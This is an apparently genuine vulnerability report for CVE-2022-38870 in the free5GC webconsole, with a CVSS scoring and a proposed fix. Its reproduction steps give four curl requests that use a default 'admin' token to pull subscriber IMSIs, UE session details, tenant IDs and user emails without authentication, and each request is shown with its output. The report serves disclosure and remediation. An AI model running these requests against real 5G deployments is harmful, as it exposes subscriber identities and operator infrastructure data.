Headline
CVE-2022-38870: [Bugs] Leaking Registered UEs,Subscriber information,Tenants and User via the Free5gc webconsole without authentication · Issue #387 · free5gc/free5gc
Free5gc v3.2.1 is vulnerable to Information disclosure.
Bug Description
Free5gc webconsole come with a default username Admin and by using this username as a token header and without any password or authentication ,it’s possible to leak all the information below :
- Registered UEs (plmnID,ueId)
- Subscriber information (AccessType,CmState,Guti,Mcc,Mnc,Dnn,PduSessionId,Sd,SmContextRef,Sst,Supi,Tac)
- Tenant and User
Steps To Reproduce
Leaking the subscriber list:
$ curl ‘http://172.27.65.183:30500/api/subscriber’ -H ‘User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0’ -H ‘Accept: application/json’ -H ‘Accept-Language: en-US,en;q=0.5’ -H ‘Accept-Encoding: gzip, deflate’ -H ‘Referer: http://172.27.65.183:30500/’ -H ‘Connection: keep-alive’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Token: admin’ -H ‘Pragma: no-cache’ -H ‘Cache-Control: no-cache’
[{"plmnID":"20893","ueId":"imsi-208930000000003"}]
Using the gathered IMSI to get the Registred UE info:
$ curl ‘http://172.27.65.183:30500/api/registered-ue-context/imsi-208930000000003’ -H ‘User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0’ -H ‘Accept: application/json’ -H ‘Accept-Language: en-US,en;q=0.5’ -H ‘Accept-Encoding: gzip, deflate’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Token: admin’ -H ‘Connection: keep-alive’ -H ‘Referer: http://172.27.65.183:30500/’
[{"AccessType":"3GPP_ACCESS","CmState":"IDLE","Guti":"20893cafe0000000014","Mcc":"208","Mnc":"93","PduSessions":[{"Dnn":"internet","PduSessionId":"1","Sd":"010203","SmContextRef":"urn:uuid:d303dc78-b85a-4071-9e47-1e86e94b1773","Sst":"1"}],"Supi":"imsi-208930000000003","Tac":"000001"}]
Leaking tenant information
$ curl ‘http://172.27.65.183:30500/api/tenant’ -H ‘User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0’ -H ‘Accept: application/json’ -H ‘Accept-Language: en-US,en;q=0.5’ -H ‘Accept-Encoding: gzip, deflate’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Token: admin’ -H ‘Connection: keep-alive’ -H ‘Referer: http://172.27.65.183:30500/’
[{"tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","tenantName":"test"}
Using the gathered tenant id to get users inforamtions on a specific tenant:
$ curl ‘http://172.27.65.183:30500/api/tenant/95e76759-cf0b-4c4f-8e93-393db0fbe503/user’ -H ‘User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0’ -H ‘Accept: application/json’ -H ‘Accept-Language: en-US,en;q=0.5’ -H ‘Accept-Encoding: gzip, deflate’ -H ‘X-Requested-With: XMLHttpRequest’ -H ‘Token: admin’ -H ‘Connection: keep-alive’ -H ‘Referer: http://172.27.65.183:30500/’
[{"userId":"715d2157-66c9-4885-b57c-48211010e237","tenantId":"95e76759-cf0b-4c4f-8e93-393db0fbe503","email":"[email protected]","encryptedPassword":""}]
Environment :
- free5GC Version: v3.2.1
- OS: Ubuntu 22.04
Risk and Impact
Risk : RISK_INFRASTRUCTURE_INFO_LEAK
Impact: TECH_IMPACT_INFO_DISCLOSURE
* Financial impact: None or not known.
* Confidentiality impact: High: It is possible to an attacker to leak Registered UEs (plmnID,ueId),Subscriber information (AccessType,CmState,Guti,Mcc,Mnc,Dnn,PduSessionId,Sd,SmContextRef,Sst,Supi,Tac) , Tenant and User
* Integrity impact: None or not known.
* Availability impact: None or not known.
CVSS Base Score: 7.5
Impact Subscore: 3.6
Exploitability Subscore: 3.9
CVSS Temporal Score: 7.5
CVSS Environmental Score: 7.5
CVSS v3 Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X)
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X
Proposed Fix:
Consider generating a complex random token and give it an expiration date.